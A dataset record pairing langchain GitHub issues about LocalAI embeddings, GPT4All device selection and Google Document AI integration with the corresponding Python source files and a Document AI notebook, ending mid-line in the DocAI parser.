### System Info macOS Ventura 13.5.2, M1 ### Who can help? @mudler ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197 ### Expected behavior Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings have no need for OpenAI; it has a whole embeddings suite: https://localai.io/features/embeddings/ I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190)
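Because the endpoint is OpenAI-compatible, the embedding can also be fetched with plain HTTP; a sketch, with the base URL and model name as placeholders:

```python
import requests

resp = requests.post(
    "http://localhost:8080/embeddings",  # placeholder LocalAI endpoint
    json={"model": "text-embedding-ada-002", "input": "This is a test query."},
    timeout=60,
)
resp.raise_for_status()
vector = resp.json()["data"][0]["embedding"]
print(len(vector))
```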
https://github.com/langchain-ai/langchain/issues/10912
https://github.com/langchain-ai/langchain/pull/10946
2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9
b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea
"2023-09-22T00:17:24Z"
python
"2023-09-29T02:56:42Z"
libs/langchain/langchain/embeddings/localai.py
from __future__ import annotations

import logging
import warnings
from typing import (
    Any,
    Callable,
    Dict,
    List,
    Literal,
    Optional,
    Sequence,
    Set,
    Tuple,
    Union,
)

from tenacity import (
    AsyncRetrying,
    before_sleep_log,
    retry,
    retry_if_exception_type,
    stop_after_attempt,
    wait_exponential,
)

from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names

logger = logging.getLogger(__name__)


def _create_retry_decorator(embeddings: LocalAIEmbeddings) -> Callable[[Any], Any]:
    import openai

    min_seconds = 4
    max_seconds = 10
    # Wait 2^x * 1 second between each retry starting with
    # 4 seconds, then up to 10 seconds, then 10 seconds afterwards
    return retry(
        reraise=True,
        stop=stop_after_attempt(embeddings.max_retries),
        wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
        retry=(
            retry_if_exception_type(openai.error.Timeout)
            | retry_if_exception_type(openai.error.APIError)
            | retry_if_exception_type(openai.error.APIConnectionError)
            | retry_if_exception_type(openai.error.RateLimitError)
            | retry_if_exception_type(openai.error.ServiceUnavailableError)
        ),
        before_sleep=before_sleep_log(logger, logging.WARNING),
    )


def _async_retry_decorator(embeddings: LocalAIEmbeddings) -> Any:
    import openai

    min_seconds = 4
    max_seconds = 10
    # Wait 2^x * 1 second between each retry starting with
    # 4 seconds, then up to 10 seconds, then 10 seconds afterwards
    async_retrying = AsyncRetrying(
        reraise=True,
        stop=stop_after_attempt(embeddings.max_retries),
        wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
        retry=(
            retry_if_exception_type(openai.error.Timeout)
            | retry_if_exception_type(openai.error.APIError)
            | retry_if_exception_type(openai.error.APIConnectionError)
            | retry_if_exception_type(openai.error.RateLimitError)
            | retry_if_exception_type(openai.error.ServiceUnavailableError)
        ),
        before_sleep=before_sleep_log(logger, logging.WARNING),
    )

    def wrap(func: Callable) -> Callable:
        async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
            async for _ in async_retrying:
                return await func(*args, **kwargs)
            raise AssertionError("this is unreachable")

        return wrapped_f

    return wrap


# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict) -> dict:
    if any(len(d["embedding"]) == 1 for d in response["data"]):
        import openai

        raise openai.error.APIError("LocalAI API returned an empty embedding")
    return response


def embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
    """Use tenacity to retry the embedding call."""
    retry_decorator = _create_retry_decorator(embeddings)

    @retry_decorator
    def _embed_with_retry(**kwargs: Any) -> Any:
        response = embeddings.client.create(**kwargs)
        return _check_response(response)

    return _embed_with_retry(**kwargs)


async def async_embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
    """Use tenacity to retry the embedding call."""

    @_async_retry_decorator(embeddings)
    async def _async_embed_with_retry(**kwargs: Any) -> Any:
        response = await embeddings.client.acreate(**kwargs)
        return _check_response(response)

    return await _async_embed_with_retry(**kwargs)


class LocalAIEmbeddings(BaseModel, Embeddings):
    """LocalAI embedding models.

    To use, you should have the ``openai`` python package installed, and the
    environment variable ``OPENAI_API_KEY`` set to a random string. You need to
    specify ``OPENAI_API_BASE`` to point to your LocalAI service endpoint.

    Example:
        .. code-block:: python

            from langchain.embeddings import LocalAIEmbeddings
            openai = LocalAIEmbeddings(
                openai_api_key="random-key",
                openai_api_base="http://localhost:8080"
            )

    """

    client: Any  #: :meta private:
    model: str = "text-embedding-ada-002"
    deployment: str = model
    openai_api_version: Optional[str] = None
    openai_api_base: Optional[str] = None
    # to support explicit proxy for LocalAI
    openai_proxy: Optional[str] = None
    embedding_ctx_length: int = 8191
    """The maximum number of tokens to embed at once."""
    openai_api_key: Optional[str] = None
    openai_organization: Optional[str] = None
    allowed_special: Union[Literal["all"], Set[str]] = set()
    disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
    chunk_size: int = 1000
    """Maximum number of texts to embed in each batch"""
    max_retries: int = 6
    """Maximum number of retries to make when generating."""
    request_timeout: Optional[Union[float, Tuple[float, float]]] = None
    """Timeout in seconds for the LocalAI request."""
    headers: Any = None
    show_progress_bar: bool = False
    """Whether to show a progress bar when embedding."""
    model_kwargs: Dict[str, Any] = Field(default_factory=dict)
    """Holds any model parameters valid for `create` call not explicitly specified."""

    class Config:
        """Configuration for this pydantic object."""

        extra = Extra.forbid

    @root_validator(pre=True)
    def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """Build extra kwargs from additional params that were passed in."""
        all_required_field_names = get_pydantic_field_names(cls)
        extra = values.get("model_kwargs", {})
        for field_name in list(values):
            if field_name in extra:
                raise ValueError(f"Found {field_name} supplied twice.")
            if field_name not in all_required_field_names:
                warnings.warn(
                    f"""WARNING! {field_name} is not default parameter.
                    {field_name} was transferred to model_kwargs.
                    Please confirm that {field_name} is what you intended."""
                )
                extra[field_name] = values.pop(field_name)

        invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
        if invalid_model_kwargs:
            raise ValueError(
                f"Parameters {invalid_model_kwargs} should be specified explicitly. "
                f"Instead they were passed in as part of `model_kwargs` parameter."
            )

        values["model_kwargs"] = extra
        return values

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that api key and python package exists in environment."""
        values["openai_api_key"] = get_from_dict_or_env(
            values, "openai_api_key", "OPENAI_API_KEY"
        )
        values["openai_api_base"] = get_from_dict_or_env(
            values,
            "openai_api_base",
            "OPENAI_API_BASE",
            default="",
        )
        values["openai_proxy"] = get_from_dict_or_env(
            values,
            "openai_proxy",
            "OPENAI_PROXY",
            default="",
        )
        default_api_version = ""
        values["openai_api_version"] = get_from_dict_or_env(
            values,
            "openai_api_version",
            "OPENAI_API_VERSION",
            default=default_api_version,
        )
        values["openai_organization"] = get_from_dict_or_env(
            values,
            "openai_organization",
            "OPENAI_ORGANIZATION",
            default="",
        )
        try:
            import openai

            values["client"] = openai.Embedding
        except ImportError:
            raise ImportError(
                "Could not import openai python package. "
                "Please install it with `pip install openai`."
            )
        return values

    @property
    def _invocation_params(self) -> Dict:
        openai_args = {
            "model": self.model,
            "request_timeout": self.request_timeout,
            "headers": self.headers,
            "api_key": self.openai_api_key,
            "organization": self.openai_organization,
            "api_base": self.openai_api_base,
            "api_version": self.openai_api_version,
            **self.model_kwargs,
        }
        if self.openai_proxy:
            import openai

            openai.proxy = {
                "http": self.openai_proxy,
                "https": self.openai_proxy,
            }  # type: ignore[assignment]  # noqa: E501
        return openai_args

    def _embedding_func(self, text: str, *, engine: str) -> List[float]:
        """Call out to LocalAI's embedding endpoint."""
        # handle large input text
        if self.model.endswith("001"):
            # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
            # replace newlines, which can negatively affect performance.
            text = text.replace("\n", " ")
        return embed_with_retry(
            self,
            input=[text],
            **self._invocation_params,
        )["data"][0]["embedding"]

    async def _aembedding_func(self, text: str, *, engine: str) -> List[float]:
        """Call out to LocalAI's embedding endpoint."""
        # handle large input text
        if self.model.endswith("001"):
            # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
            # replace newlines, which can negatively affect performance.
            text = text.replace("\n", " ")
        return (
            await async_embed_with_retry(
                self,
                input=[text],
                **self._invocation_params,
            )
        )["data"][0]["embedding"]

    def embed_documents(
        self, texts: List[str], chunk_size: Optional[int] = 0
    ) -> List[List[float]]:
        """Call out to LocalAI's embedding endpoint for embedding search docs.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size of embeddings. If None, will use the chunk
                size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        # call _embedding_func for each text
        return [self._embedding_func(text, engine=self.deployment) for text in texts]

    async def aembed_documents(
        self, texts: List[str], chunk_size: Optional[int] = 0
    ) -> List[List[float]]:
        """Call out to LocalAI's embedding endpoint async for embedding search docs.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size of embeddings. If None, will use the chunk
                size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        embeddings = []
        for text in texts:
            response = await self._aembedding_func(text, engine=self.deployment)
            embeddings.append(response)
        return embeddings

    def embed_query(self, text: str) -> List[float]:
        """Call out to LocalAI's embedding endpoint for embedding query text.

        Args:
            text: The text to embed.

        Returns:
            Embedding for the text.
        """
        embedding = self._embedding_func(text, engine=self.deployment)
        return embedding

    async def aembed_query(self, text: str) -> List[float]:
        """Call out to LocalAI's embedding endpoint async for embedding query text.

        Args:
            text: The text to embed.

        Returns:
            Embedding for the text.
        """
        embedding = await self._aembedding_func(text, engine=self.deployment)
        return embedding
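For readers trying this class out, a minimal usage sketch (the endpoint, key, and texts below are illustrative placeholders; LocalAI does not validate the API key, which is why a random string suffices):

```python
from langchain.embeddings import LocalAIEmbeddings

# Assumed setup: a LocalAI server on localhost:8080 exposing an
# OpenAI-compatible /embeddings endpoint.
embeddings = LocalAIEmbeddings(
    openai_api_key="random-key",
    openai_api_base="http://localhost:8080",
)

query_vector = embeddings.embed_query("What is LocalAI?")
doc_vectors = embeddings.embed_documents(["LocalAI is a local OpenAI drop-in."])
print(len(query_vector), len(doc_vectors))
```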
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,486
Add device to GPT4All
### Feature request

Hey guys! Thanks for the great tool you've developed. LLaMA now supports device selection, and so does GPT4All: https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__

Can you please add the device property to the file "langchain/llms/gpt4all.py", LN 96:

```python
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
```

Model init:

```python
values["client"] = GPT4AllModel(
    model_name,
    model_path=model_path or None,
    model_type=values["backend"],
    allow_download=values["allow_download"],
    device=values["device"],
)
```

### Motivation

The device parameter is needed to run on GPU-powered machines.

### Your contribution

None.. :(
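In the meantime, the device can be selected through the raw bindings. A small sketch based on the gpt4all Python docs linked above (the model filename is illustrative, and the exact set of accepted device names depends on the installed gpt4all version):

```python
from gpt4all import GPT4All

# Per the linked gpt4all docs, the constructor accepts a `device`
# argument; "gpu" asks the bindings to pick a suitable GPU.
# "orca-mini-3b.ggmlv3.q4_0.bin" is just an example model name.
model = GPT4All("orca-mini-3b.ggmlv3.q4_0.bin", device="gpu")
print(model.generate("Once upon a time, ", max_tokens=32))
```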
https://github.com/langchain-ai/langchain/issues/10486
https://github.com/langchain-ai/langchain/pull/11216
92683262f4a6c2db95c3aad40a6f6dfde2df43d1
c6d7124675902e3a2628559d8a2b22c30747f75d
"2023-09-12T09:02:19Z"
python
"2023-10-04T00:37:30Z"
libs/langchain/langchain/llms/gpt4all.py
from functools import partial
from typing import Any, Dict, List, Mapping, Optional, Set

from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra, Field, root_validator


class GPT4All(LLM):
    """GPT4All language models.

    To use, you should have the ``gpt4all`` python package installed, the
    pre-trained model file, and the model's config information.

    Example:
        .. code-block:: python

            from langchain.llms import GPT4All
            model = GPT4All(model="./models/gpt4all-model.bin", n_threads=8)

            # Simplest invocation
            response = model("Once upon a time, ")
    """

    model: str
    """Path to the pre-trained GPT4All model file."""

    backend: Optional[str] = Field(None, alias="backend")

    max_tokens: int = Field(200, alias="max_tokens")
    """Token context window."""

    n_parts: int = Field(-1, alias="n_parts")
    """Number of parts to split the model into.
    If -1, the number of parts is automatically determined."""

    seed: int = Field(0, alias="seed")
    """Seed. If -1, a random seed is used."""

    f16_kv: bool = Field(False, alias="f16_kv")
    """Use half-precision for key/value cache."""

    logits_all: bool = Field(False, alias="logits_all")
    """Return logits for all tokens, not just the last token."""

    vocab_only: bool = Field(False, alias="vocab_only")
    """Only load the vocabulary, no weights."""

    use_mlock: bool = Field(False, alias="use_mlock")
    """Force system to keep model in RAM."""

    embedding: bool = Field(False, alias="embedding")
    """Use embedding mode only."""

    n_threads: Optional[int] = Field(4, alias="n_threads")
    """Number of threads to use."""

    n_predict: Optional[int] = 256
    """The maximum number of tokens to generate."""

    temp: Optional[float] = 0.7
    """The temperature to use for sampling."""

    top_p: Optional[float] = 0.1
    """The top-p value to use for sampling."""

    top_k: Optional[int] = 40
    """The top-k value to use for sampling."""

    echo: Optional[bool] = False
    """Whether to echo the prompt."""

    stop: Optional[List[str]] = []
    """A list of strings to stop generation when encountered."""

    repeat_last_n: Optional[int] = 64
    "Last n tokens to penalize"

    repeat_penalty: Optional[float] = 1.18
    """The penalty to apply to repeated tokens."""

    n_batch: int = Field(8, alias="n_batch")
    """Batch size for prompt processing."""

    streaming: bool = False
    """Whether to stream the results or not."""

    allow_download: bool = False
    """If model does not exist in ~/.cache/gpt4all/, download it."""

    client: Any = None  #: :meta private:

    class Config:
        """Configuration for this pydantic object."""

        extra = Extra.forbid

    @staticmethod
    def _model_param_names() -> Set[str]:
        return {
            "max_tokens",
            "n_predict",
            "top_k",
            "top_p",
            "temp",
            "n_batch",
            "repeat_penalty",
            "repeat_last_n",
        }

    def _default_params(self) -> Dict[str, Any]:
        return {
            "max_tokens": self.max_tokens,
            "n_predict": self.n_predict,
            "top_k": self.top_k,
            "top_p": self.top_p,
            "temp": self.temp,
            "n_batch": self.n_batch,
            "repeat_penalty": self.repeat_penalty,
            "repeat_last_n": self.repeat_last_n,
        }

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that the python package exists in the environment."""
        try:
            from gpt4all import GPT4All as GPT4AllModel
        except ImportError:
            raise ImportError(
                "Could not import gpt4all python package. "
                "Please install it with `pip install gpt4all`."
            )

        full_path = values["model"]
        model_path, delimiter, model_name = full_path.rpartition("/")
        model_path += delimiter

        values["client"] = GPT4AllModel(
            model_name,
            model_path=model_path or None,
            model_type=values["backend"],
            allow_download=values["allow_download"],
        )
        if values["n_threads"] is not None:
            # set n_threads
            values["client"].model.set_thread_count(values["n_threads"])

        try:
            values["backend"] = values["client"].model_type
        except AttributeError:
            # The below is for compatibility with GPT4All Python bindings <= 0.2.3.
            values["backend"] = values["client"].model.model_type

        return values

    @property
    def _identifying_params(self) -> Mapping[str, Any]:
        """Get the identifying parameters."""
        return {
            "model": self.model,
            **self._default_params(),
            **{
                k: v
                for k, v in self.__dict__.items()
                if k in self._model_param_names()
            },
        }

    @property
    def _llm_type(self) -> str:
        """Return the type of llm."""
        return "gpt4all"

    def _call(
        self,
        prompt: str,
        stop: Optional[List[str]] = None,
        run_manager: Optional[CallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> str:
        r"""Call out to GPT4All's generate method.

        Args:
            prompt: The prompt to pass into the model.
            stop: A list of strings to stop generation when encountered.

        Returns:
            The string generated by the model.

        Example:
            .. code-block:: python

                prompt = "Once upon a time, "
                response = model(prompt, n_predict=55)
        """
        text_callback = None
        if run_manager:
            text_callback = partial(run_manager.on_llm_new_token, verbose=self.verbose)
        text = ""
        params = {**self._default_params(), **kwargs}
        for token in self.client.generate(prompt, **params):
            if text_callback:
                text_callback(token)
            text += token
        if stop is not None:
            text = enforce_stop_tokens(text, stop)
        return text
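Because `_call` forwards each generated token to `run_manager.on_llm_new_token`, tokens can be streamed to stdout with a standard callback handler. A short usage sketch (the model path is illustrative):

```python
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
from langchain.llms import GPT4All

# Illustrative model path; any local model supported by the gpt4all
# bindings should work here.
llm = GPT4All(
    model="./models/gpt4all-model.bin",
    callbacks=[StreamingStdOutCallbackHandler()],
)

# Tokens are printed as they are produced, because _call above forwards
# each token to run_manager.on_llm_new_token.
llm("Once upon a time, ")
```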
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,589
Add Google Cloud Document AI integration
### Feature request

Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.

### Motivation

This product offers optical character recognition, specialized processors for specific document types, and built-in generative AI processing for document summarization and entity extraction.

### Your contribution

I can implement this myself; I mostly want to understand where and how this could fit into the library. Should it be a document transformer? An LLM? An output parser? A retriever? Document AI does all of these in some capacity.

Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to LangChain (like Document OCR to extract text and fields before sending them to an LLM), or using the Document AI processors with generative AI directly for the summarization/Q&A output.
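One way the "OCR before sending to an LLM" pattern mentioned above can look in practice, using the `DocAIParser` this integration ultimately added (shown in full later in this record set). The processor name, bucket paths, and the choice of `VertexAI` for summarization are all illustrative assumptions:

```python
from langchain.chains.summarize import load_summarize_chain
from langchain.document_loaders.blob_loaders import Blob
from langchain.document_loaders.parsers import DocAIParser
from langchain.llms import VertexAI

# All identifiers below are placeholders for this sketch.
parser = DocAIParser(
    location="us",
    processor_name="projects/PROJECT_NUMBER/locations/us/processors/PROCESSOR_ID",
    gcs_output_path="gs://my-bucket/docai-output/",
)

# OCR a PDF stored on GCS into per-page Documents...
docs = list(parser.lazy_parse(Blob(path="gs://my-bucket/report.pdf")))

# ...then hand the extracted text to an LLM for summarization.
chain = load_summarize_chain(VertexAI(), chain_type="map_reduce")
print(chain.run(docs))
```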
https://github.com/langchain-ai/langchain/issues/10589
https://github.com/langchain-ai/langchain/pull/11413
628cc4cce8b4e6068dacc92836cc8045b94afa37
09c66fe04fe20b39d307df0419d742a7a28bab98
"2023-09-14T16:57:14Z"
python
"2023-10-09T15:04:25Z"
docs/docs_skeleton/docs/integrations/document_transformers/docai.ipynb
{ "cells": [ { "cell_type": "markdown", "id": "310fce10-e051-40db-89b0-5b5bb85cd145", "metadata": {}, "source": [ "# Document AI\n" ] }, { "cell_type": "markdown", "id": "f95ac25b-f025-40c3-95b8-77919fc4da7f", "metadata": {}, "source": [ ">[Document AI](https://cloud.google.com/document-ai/docs/overview) is a `Google Cloud Platform` service to transform unstructured data from documents into structured data, making it easier to understand, analyze, and consume. " ] }, { "cell_type": "markdown", "id": "275f2193-248f-4565-a872-93a89589cf2b", "metadata": {}, "source": [ "The module contains a `PDF` parser based on DocAI from Google Cloud.\n", "\n", "You need to install two libraries to use this parser:" ] }, { "cell_type": "code", "execution_count": null, "id": "34132fab-0069-4942-b68b-5b093ccfc92a", "metadata": {}, "outputs": [], "source": [ "!pip install google-cloud-documentai\n", "!pip install google-cloud-documentai-toolbox" ] }, { "cell_type": "markdown", "id": "51946817-798c-4d11-abd6-db2ae53a0270", "metadata": {}, "source": [ "First, you need to set up a [`GCS` bucket and create your own OCR processor](https://cloud.google.com/document-ai/docs/create-processor) \n", "The `GCS_OUTPUT_PATH` should be a path to a folder on GCS (starting with `gs://`) and a processor name should look like `projects/PROJECT_NUMBER/locations/LOCATION/processors/PROCESSOR_ID`. You can get it either programmatically or copy from the `Prediction endpoint` section of the `Processor details` tab in the Google Cloud Console." ] }, { "cell_type": "code", "execution_count": 2, "id": "ac85f7f3-3ef6-41d5-920a-b55f2939c202", "metadata": {}, "outputs": [], "source": [ "PROJECT = \"PUT_SOMETHING_HERE\"\n", "GCS_OUTPUT_PATH = \"PUT_SOMETHING_HERE\"\n", "PROCESSOR_NAME = \"PUT_SOMETHING_HERE\"" ] }, { "cell_type": "code", "execution_count": 1, "id": "48438efb-9f0d-473b-a91c-9f1e29c2539d", "metadata": {}, "outputs": [], "source": [ "from langchain.document_loaders.blob_loaders import Blob\n", "from langchain.document_loaders.parsers import DocAIParser" ] }, { "cell_type": "markdown", "id": "fad2bcca-1c0e-4888-b82d-15823ba57e60", "metadata": {}, "source": [ "Now, let's create a parser:" ] }, { "cell_type": "code", "execution_count": 3, "id": "dcc0c65a-86c5-448d-8b21-2e564b1903b7", "metadata": {}, "outputs": [], "source": [ "parser = DocAIParser(location=\"us\", processor_name=PROCESSOR_NAME, gcs_output_path=GCS_OUTPUT_PATH)" ] }, { "cell_type": "markdown", "id": "b8b5a3ff-650a-4ad3-a73a-395f86e4c9e1", "metadata": {}, "source": [ "Let's go and parse an Alphabet's take from here: https://abc.xyz/assets/a7/5b/9e5ae0364b12b4c883f3cf748226/goog-exhibit-99-1-q1-2023-19.pdf. Copy it to your GCS bucket first, and adjust the path below." 
] }, { "cell_type": "code", "execution_count": 4, "id": "373cc18e-a311-4c8d-8180-47e4ade1d2ad", "metadata": {}, "outputs": [], "source": [ "blob = Blob(path=\"gs://vertex-pgt/examples/goog-exhibit-99-1-q1-2023-19.pdf\")" ] }, { "cell_type": "code", "execution_count": 5, "id": "6ef84fad-2981-456d-a6b4-3a6a1a46d511", "metadata": {}, "outputs": [], "source": [ "docs = list(parser.lazy_parse(blob))" ] }, { "cell_type": "markdown", "id": "3f8e4ee1-e07d-4c29-a120-4d56aae91859", "metadata": {}, "source": [ "We'll get one document per page, 11 in total:" ] }, { "cell_type": "code", "execution_count": 8, "id": "343919f5-35d2-47fb-9790-de464649ebdf", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "11\n" ] } ], "source": [ "print(len(docs))" ] }, { "cell_type": "markdown", "id": "b104ae56-011b-4abe-ac07-e999c69494c5", "metadata": {}, "source": [ "You can run end-to-end parsing of a blob one-by-one. If you have many documents, it might be a better approach to batch them together and maybe even detach parsing from handling the results of parsing." ] }, { "cell_type": "code", "execution_count": 9, "id": "9ecc1b99-5cef-47b0-a125-dbb2c41d2224", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "['projects/543079149601/locations/us/operations/16447136779727347991']\n" ] } ], "source": [ "operations = parser.docai_parse([blob])\n", "print([op.operation.name for op in operations])" ] }, { "cell_type": "markdown", "id": "a2d24d63-c2c7-454c-9df3-2a9cf51309a6", "metadata": {}, "source": [ "You can check whether operations are finished:" ] }, { "cell_type": "code", "execution_count": 10, "id": "ab11efb0-e514-4f44-9ba5-3d638a59c9e6", "metadata": {}, "outputs": [ { "data": { "text/plain": [ "True" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "parser.is_running(operations)" ] }, { "cell_type": "markdown", "id": "602ca0bc-080a-4a4e-a413-0e705aeab189", "metadata": {}, "source": [ "And when they're finished, you can parse the results:" ] }, { "cell_type": "code", "execution_count": 11, "id": "ec1e6041-bc10-47d4-ba64-d09055c14f27", "metadata": {}, "outputs": [ { "data": { "text/plain": [ "False" ] }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "source": [ "parser.is_running(operations)" ] }, { "cell_type": "code", "execution_count": 12, "id": "95d89da4-1c8a-413d-8473-ddd4a39375a5", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "DocAIParsingResults(source_path='gs://vertex-pgt/examples/goog-exhibit-99-1-q1-2023-19.pdf', parsed_path='gs://vertex-pgt/test/run1/16447136779727347991/0')\n" ] } ], "source": [ "results = parser.get_results(operations)\n", "print(results[0])" ] }, { "cell_type": "markdown", "id": "87e5b606-1679-46c7-9577-4cf9bc93a752", "metadata": {}, "source": [ "And now we can finally generate Documents from parsed results:" ] }, { "cell_type": "code", "execution_count": 15, "id": "08e8878d-889b-41ad-9500-2f772d38782f", "metadata": {}, "outputs": [], "source": [ "docs = list(parser.parse_from_results(results))" ] }, { "cell_type": "code", "execution_count": 16, "id": "c59525fb-448d-444b-8f12-c4aea791e19b", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "11\n" ] } ], "source": [ "print(len(docs))" ] } ], "metadata": { "environment": { "kernel": "python3", "name": "common-cpu.m109", "type": "gcloud", "uri": "gcr.io/deeplearning-platform-release/base-cpu:m109" }, "kernelspec": { 
"display_name": "Python 3 (ipykernel)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.10.12" } }, "nbformat": 4, "nbformat_minor": 5 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,589
Add Google Cloud Document AI integration
### Feature request

Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing.

### Motivation

This product offers optical character recognition, specialized processors for specific document types, and built-in generative AI processing for document summarization and entity extraction.

### Your contribution

I can implement this myself; I mostly want to understand where and how this could fit into the library. Should it be a document transformer? An LLM? An output parser? A retriever? Document AI does all of these in some capacity.

Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to LangChain (like Document OCR to extract text and fields before sending them to an LLM), or using the Document AI processors with generative AI directly for the summarization/Q&A output.
https://github.com/langchain-ai/langchain/issues/10589
https://github.com/langchain-ai/langchain/pull/11413
628cc4cce8b4e6068dacc92836cc8045b94afa37
09c66fe04fe20b39d307df0419d742a7a28bab98
"2023-09-14T16:57:14Z"
python
"2023-10-09T15:04:25Z"
libs/langchain/langchain/document_loaders/parsers/docai.py
"""Module contains a PDF parser based on DocAI from Google Cloud. You need to install two libraries to use this parser: pip install google-cloud-documentai pip install google-cloud-documentai-toolbox """ import logging import time from dataclasses import dataclass from typing import TYPE_CHECKING, Iterator, List, Optional, Sequence from langchain.docstore.document import Document from langchain.document_loaders.base import BaseBlobParser from langchain.document_loaders.blob_loaders import Blob from langchain.utils.iter import batch_iterate if TYPE_CHECKING: from google.api_core.operation import Operation from google.cloud.documentai import DocumentProcessorServiceClient logger = logging.getLogger(__name__) @dataclass class DocAIParsingResults: """A dataclass to store DocAI parsing results.""" source_path: str parsed_path: str class DocAIParser(BaseBlobParser): def __init__( self, *, client: Optional["DocumentProcessorServiceClient"] = None, location: Optional[str] = None, gcs_output_path: Optional[str] = None, processor_name: Optional[str] = None, ): """Initializes the parser. Args: client: a DocumentProcessorServiceClient to use location: a GCP location where a DOcAI parser is located gcs_output_path: a path on GCS to store parsing results processor_name: name of a processor You should provide either a client or location (and then a client would be instantiated). """ if client and location: raise ValueError( "You should provide either a client or a location but not both " "of them." ) if not client and not location: raise ValueError( "You must specify either a client or a location to instantiate " "a client." ) self._gcs_output_path = gcs_output_path self._processor_name = processor_name if client: self._client = client else: try: from google.api_core.client_options import ClientOptions from google.cloud.documentai import DocumentProcessorServiceClient except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install google-cloud-documentai`" ) options = ClientOptions( api_endpoint=f"{location}-documentai.googleapis.com" ) self._client = DocumentProcessorServiceClient(client_options=options) def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Parses a blob lazily. Args: blobs: a Blob to parse This is a long-running operations! A recommended way is to batch documents together and use `batch_parse` method. """ yield from self.batch_parse([blob], gcs_output_path=self._gcs_output_path) def batch_parse( self, blobs: Sequence[Blob], gcs_output_path: Optional[str] = None, timeout_sec: int = 3600, check_in_interval_sec: int = 60, ) -> Iterator[Document]: """Parses a list of blobs lazily. Args: blobs: a list of blobs to parse gcs_output_path: a path on GCS to store parsing results timeout_sec: a timeout to wait for DocAI to complete, in seconds check_in_interval_sec: an interval to wait until next check whether parsing operations have been completed, in seconds This is a long-running operations! 
A recommended way is to decouple parsing from creating Langchain Documents: >>> operations = parser.docai_parse(blobs, gcs_path) >>> parser.is_running(operations) You can get operations names and save them: >>> names = [op.operation.name for op in operations] And when all operations are finished, you can use their results: >>> operations = parser.operations_from_names(operation_names) >>> results = parser.get_results(operations) >>> docs = parser.parse_from_results(results) """ output_path = gcs_output_path if gcs_output_path else self._gcs_output_path if output_path is None: raise ValueError("An output path on GCS should be provided!") operations = self.docai_parse(blobs, gcs_output_path=output_path) operation_names = [op.operation.name for op in operations] logger.debug( f"Started parsing with DocAI, submitted operations {operation_names}" ) is_running, time_elapsed = True, 0 while is_running: is_running = self.is_running(operations) if not is_running: break time.sleep(check_in_interval_sec) time_elapsed += check_in_interval_sec if time_elapsed > timeout_sec: raise ValueError( "Timeout exceeded! Check operations " f"{operation_names} later!" ) logger.debug(".") results = self.get_results(operations=operations) yield from self.parse_from_results(results) def parse_from_results( self, results: List[DocAIParsingResults] ) -> Iterator[Document]: try: from google.cloud.documentai_toolbox.wrappers.document import _get_shards from google.cloud.documentai_toolbox.wrappers.page import _text_from_layout except ImportError: raise ImportError( "documentai_toolbox package not found, please install it with" " `pip install google-cloud-documentai-toolbox`" ) for result in results: output_gcs = result.parsed_path.split("/") gcs_bucket_name = output_gcs[2] gcs_prefix = 